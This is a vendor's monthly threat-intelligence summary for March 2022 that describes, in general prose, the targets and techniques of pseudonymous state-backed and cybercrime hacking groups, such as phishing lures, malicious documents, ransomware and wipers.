Monthly Threat Actor Group Intelligence Report, March 2022 (ENG)

This document describes issues related to hacking group activities identified from 21 February 2022 to 20 March 2022 and includes information on related infringement incidents and threat event within ThreatRecon Platform.

1. Characteristics of SectorA Group Activities

In March 2022, activities by a total of 5 hacking groups were identified, and the groups were SectorA02, SectorA03, SectorA05, SectorA06, SectorA07 groups

SectorA02 group was found to be active in South Korea. In this activity, the group disguised themselves as personnel of South Korea’s central administrative institution to carry out the attack. The group built phishing websites to collect information and used HWP bait documents so that the targets will be interested.

SectorA03 group was found to be active in Macao. The group used spear phishing emails to launch attacks on workers of 20 companies in Macao such as hotel business and restaurants.

SectorA05 group was found to be active in South Korea and Hong Kong. The group used multiple phishing emails disguised as electronic documents sent from government institutions.

SectorA06 group was found to be active in South Korea, Japan, France, Singapore, United States and England. In this activity, the group used CHM (Compiled HTML File) files, a type of help files in their attacks.

SectorA07 group was found to be active in South Korea. The group used MS word documents disguised as product information in their attacks.

Hacking activities of SectorA hacking groups that continue to date aim to collect advanced information regarding South Korean governmental activities such as political, diplomatic activities, while targeting hacking activities on the whole world to secure financial resources at the same time. This aim for hacking activities has continued over a long period of time and is expected to be carried on without changes for some time.

2. Characteristics of SectorB Group Activities

In March 2022, activities by a total of 3 hacking groups were identified, and the groups were SectorB01, SectorB09, SectorB22 groups

SectorB01 group was found to be active in United States, Hong Kong, England, China, and Vietnam. The group used vulnerabilities of Log4j and USAHerds to penetrate systems. Afterwards, they installed PE (Portable Executable) format malware in the target’s system and often utilized open-source tools to steal system controls.

SectorB09 group was found to be active in Taiwan and South Korea. In this activity, the group used ELF (Executable and Linkable) format malware to collect information from the infected system and serve commands from the C2 server such as file transfer, remote shell commands, proxy modes to control the malware.

SectorB22 group was found to be active in Russia, Rumania, Hong Kong, Czech Republic, Slovakia, United States, Belgium, and Poland. The group attached compressed files in spear phishing emails to serve multiple attacks targeted on workers of diplomatic institutions in Europe.

Hacking activities of SectorB hacking groups that continue to date are seen to be aiming to collect advanced information on governmental activities such as political, diplomatic activities, and is targeted at the whole world.

3. Characteristics of SectorC Group Activities

In March 2022, activities by a total of 6 hacking groups were identified, and the groups were SectorC01, SectorC04, SectorC05, SectorC08, SectorC15, SectorC16 groups

SectorC01 group was found to be active in Ukraine. The group utilized delicately created phishing emails and websites to read emails saved in the internal mail system or leak them externally. In this activity, they served a large-size credential phishing campaign against users of a Ukrainian media-related company.

SectorC04 group was found to be active in Taiwan and India. The group used LNK files included in ISO image files to load malicious DLL files and install pen-testing tools such as Sliver or Cobalt Strike on the system to steal system controls. In this activity, they used malicious PDF files disguised as COVID-19 related files and a meeting with the Indian president.

SectorC05 group was found to be active in United States. The group created botnets targeted on IoT (Internet of Things) devices, routers, and memory storages, and as most IoT devices are in Linux OS, they mostly made use of malwares in ELF file format. In this activity, they used botnets targeted on a specific company’s router device.

SectorC08 group was found to be active in Ukraine, England, Vietnam, United States, and Spain. The group utilized MS word file malware using the template injection method to install PE (Portable Executable) format malware in the target’s system and steal system controls. In this activity, the group used MS word documents related to news regarding Ukraine, or documents related to Ukrainian social network monitoring.

SectorC15 group was found to be active in Ukraine, France, England, China, Netherlands, Cyprus, Singapore, Jamaica, Germany, Canada, Denmark, Spain, the Philippines, Servia, Moldova, Turkey, Saudi Arabia, Russia, United States, and Italy. The group attached malware written in Go programing language in phishing emails related to Ukrainian Cybersecurity and passed it to the targets.

SectorC16 group was found to be active in Ukraine. The group attached compressed files containing LNK files to phishing emails for dissemination and executing the LNK file downloads a HTA file in the computer for execution. The final payload is a malware having backdoor functions.

Hacking activities of SectorC hacking groups that continue to date are seen to be aiming to collect advanced information on governmental activities such as political, diplomatic activities, targeted at the whole world, including countries near the supporting government’s borders.

4. Characteristics of SectorD Group Activities

In March 2022, activities by a total of 1 hacking groups were identified, and the groups were SectorD14 groups

SectorD14 group was found to be active in Turkey, Israel, Canada, and Tunisia. The group used social engineering techniques of impersonating workers in the HR department to approach victims and created fake Social Network Service accounts disguised as a HR employee to avoid suspicion from the targets. In this activity, they disguised the malware file as a normal PDF document by changing the icon.

SectorD hacking groups mostly served hacking activities targeted on countries in political conflicts with supported government, and the group is recently seen to be collecting advanced information such as political, diplomatic activities of individuals or governments against the supporting government.

5. Characteristics of SectorE Group Activities

In March 2022, activities by a total of 5 hacking groups were identified, and the groups were SectorE01, SectorE02, SectorE04, SectorE05, SectorE06 groups

SectorE01 group was found to be active in Pakistan. In this activity, the group disseminated Excel document malware using the Dropbox cloud storage service.

SectorE02 group was found to be active in Finland, Saudi Arabia, the United States, Kenya, England, Nepal, Hong Kong, China, and India. The group used MS Word and Excel documents under various topics in their attacks.

SectorE04 group was found to be active in England, Pakistan, and Indonesia. The group used the technique of building phishing websites to collect the target’s information.

SectorE05 group was found to be active in England, Czech Republic, China, India, and the United States. The group continued using the CHM (Compiled HTML File) which is a help file format, following the February activities.

SectorE06 group was found to be active in India, the United States, China, and England. The group disseminated compressed files containing LNK files disguised as documents related to the military for their attacks.

Hacking activities of SectorE hacking groups that continue to date are seen to be aiming to collect advanced information regarding such as political, diplomatic, military activities. However, considering that they have expanded their targets to East Asian countries including China and other areas recently, it is analyzed that the proportion of hacking activities to collect advanced information related to politics, diplomacy, and technology from these countries have increased.

6. Characteristics of SectorH Group Activities

In March 2022, activities by a total of 1 hacking groups were identified, and the groups were SectorH03 groups

SectorH03 group was found to be active in India, the United States, China, and England. The group used government institution related documents as baits to avoid suspicion of users and downloaded multiple malwares in the victim’s system to steal information.

Hacking activities of SectorH hacking group consists of cybercrime hacking activities and government supported hacking activities. Diplomatic clashes has been ongoing between the backing country and the bordering country, India, so it is analyzed that they will continue activities to collect advanced information regarding Indian government agencies’ military and politics to their need.

7. Characteristics of cybercrime group activities

In March 2022, activities by a total of 8 hacking groups were identified, and the groups were SectorJ03, SectorJ04, SectorJ06, SectorJ09, SectorJ14, SectorJ26, SectorJ42, SectorJ44 groups

Unlike other government-supported hacking groups, they steal online information of monetary value in the real world or directly hacks specific companies and organizations to distribute ransomware in their internal networks, or steal important industrial confidential information and threaten to demand ransom in return.

SectorJ03 group was found to be active in Palestine. The group changed the icon of the malwares to the PDF icon to disguise them as normal PDF files, and when executed, shows contents related to the opening ceremony schedule of the Palestine Central Committee to seem like normal files.

SectorJ04 group was found to be active in the United States. The group used the technique of distributing remote control malware or ransomwares through phishing emails to the victims, with the purpose of stealing company information and to secure financial resources.

SectorJ06 group was found to be active in the United States, France, and Italy. The group distributed MS Word and Excel file format malwares with malicious macros inserted and continued to use the technique of installing ransomwares in the system with the purpose of securing financial resources.

SectorJ09 group continued using their hacking technique of inserting obfuscated skimming scripts in websites to collect username, address, email, phone numbers and credit card payment details at the payment page. They also used a malware to collect credentials and cryptocurrency information by advertising as DDoS tools to attack Russian companies.

SectorJ14 group was found to be active in Malaysia and Japan. The group have been using multiple languages to be active on multiplatform since 2018, and they are seen to be carrying out hacking activities with the sole purpose of securing financial resources.

SectorJ26 group was found to be active in Argentina, Ukraine, the United States, South Korea, England, Australia, the Philippines, Switzerland, China, Canada, Israel, Germany, Ireland, Netherlands, India, Suriname, Iran, Italy, France, and Switzerland. The group attached backdoor malware used in stealing of system authorization to phishing emails disguised as business proposals, and they are seen to be stealing system authorizations with the purpose of infecting systems with ransomwares to secure financial resources.

SectorJ42 group was found to be active in Singapore, Estonia, Hong Kong, South Korea, England, Indonesia, Japan, Israel, Taiwan, and China. The group used ELF file format malwares in UNIX and LINUX environments for financial purposes. In this activity, the ELF file format malware was used to withdraw unauthorized cash from ATMs (Automated Teller Machines).

SectorJ44 group was found to be active in China, Ukraine, Singapore, South Korea, Iran, and the United States. The group is seen to have developed a new ransomware for management.

8. Characteristics of SectorS group activities

In March 2022, activities by a total of 1 hacking groups were identified, and the groups were SectorS01 groups

SectorS01 group was found to be active in Ecuador, England, Chile, the United States, Israel, Russia, Columbia, and South Korea. The group used documents disguised as tax return documents, and used a malicious link included in the document to distribute malwares. In the victim’s system, they used malware to steal system information and downloaded additional malwares for execution.

Hacking activities of SectorS group activities to date is to collect advanced information on governmental activities of South American countries such as political, diplomatic, and military activities.

9. Characteristics of SectorT group activities

In March 2022, activities by a total of 1 hacking groups were identified, and the groups were SectorT01 groups

SectorT01 group was seen to be active in India, Romania, China, Hungary, Czech Republic, Sweden, Lithuania, United States, Latvia, Poland, Netherlands, Ukraine, Italy, Brazil, Russia, Serbia, Slovakia, United Kingdom, Moldova, South Korea. The group distributed CHM (Compiled HTML File) files disguised as documents related to COVID-19 to serve their attacks. In this activity, they installed Cobalt Strike and backdoor in the target’s system to steal information from their system. Additionally, they disseminated Wiper malware against Ukraine government and Ukraine government network to destroy their systems.

It is analyzed that the purpose of the SectorT hacking group’s hacking activities to date is to collect advanced information on government activities of EU countries such as political, diplomatic, and military activities.

The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net